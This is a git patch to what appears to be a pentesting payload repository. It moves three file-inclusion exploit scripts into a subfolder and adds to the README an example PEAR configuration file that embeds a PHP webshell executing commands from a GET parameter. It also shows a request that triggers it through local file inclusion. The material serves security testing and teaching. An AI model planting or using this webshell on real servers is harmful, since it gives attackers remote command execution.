From 892c68e6e7c4daa53b65ec71cb9c9a9d9904fdcf Mon Sep 17 00:00:00 2001
From: Swissky <12152583+swisskyrepo@users.noreply.github.com>
Date: Mon, 2 Oct 2023 17:12:36 +0200
Subject: [PATCH] PEAR_Config example

---
 File Inclusion/{ => Files}/LFI2RCE.py    | 0
 File Inclusion/{ => Files}/phpinfolfi.py | 0
 File Inclusion/{ => Files}/uploadlfi.py  | 0
 File Inclusion/README.md                 | 7 +++++++
 4 files changed, 7 insertions(+)
 rename File Inclusion/{ => Files}/LFI2RCE.py (100%)
 rename File Inclusion/{ => Files}/phpinfolfi.py (100%)
 rename File Inclusion/{ => Files}/uploadlfi.py (100%)

diff --git a/File Inclusion/LFI2RCE.py b/File Inclusion/Files/LFI2RCE.py
similarity index 100%
rename from File Inclusion/LFI2RCE.py
rename to File Inclusion/Files/LFI2RCE.py
diff --git a/File Inclusion/phpinfolfi.py b/File Inclusion/Files/phpinfolfi.py
similarity index 100%
rename from File Inclusion/phpinfolfi.py
rename to File Inclusion/Files/phpinfolfi.py
diff --git a/File Inclusion/uploadlfi.py b/File Inclusion/Files/uploadlfi.py
similarity index 100%
rename from File Inclusion/uploadlfi.py
rename to File Inclusion/Files/uploadlfi.py
diff --git a/File Inclusion/README.md b/File Inclusion/README.md
index 9fece48..566245d 100644
--- a/File Inclusion/README.md	
+++ b/File Inclusion/README.md	
@@ -520,6 +520,13 @@ There are two ways to exploit it.
   /vuln.php?file=/tmp/exec.php&c=id
   ```
 
+The created configuration file contains the webshell.
+
+```php
+#PEAR_Config 0.9
+a:2:{s:10:"__channels";a:2:{s:12:"pecl.php.net";a:0:{}s:5:"__uri";a:0:{}}s:7:"man_dir";s:29:"<?echo(system($_GET['c']));?>";}
+```
+
 
 ## LFI to RCE via credentials files